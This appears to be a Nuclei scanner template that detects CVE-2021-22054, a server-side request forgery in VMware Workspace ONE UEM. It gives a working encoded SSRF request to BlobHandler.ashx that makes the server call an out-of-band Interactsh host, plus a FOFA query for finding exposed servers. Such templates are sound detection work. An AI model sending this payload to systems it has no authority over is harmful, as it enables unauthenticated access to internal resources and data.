nuclei-templates/http/cves/2021/CVE-2021-22054.yaml

40 lines
1.5 KiB
YAML

id: CVE-2021-22054
info:
name: VMWare Workspace ONE UEM - Server-Side Request Forgery
author: h1ei1
severity: high
description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
reference:
- https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
- https://www.vmware.com/security/advisories/VMSA-2021-0029.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-22054
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-22054
cwe-id: CWE-918
cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*
epss-score: 0.89196
metadata:
max-request: 1
fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx"
tags: cve,cve2021,vmware,workspace,ssrf
http:
- method: GET
path:
- "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"
matchers-condition: and
matchers:
- type: word
words:
- "Interactsh Server"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27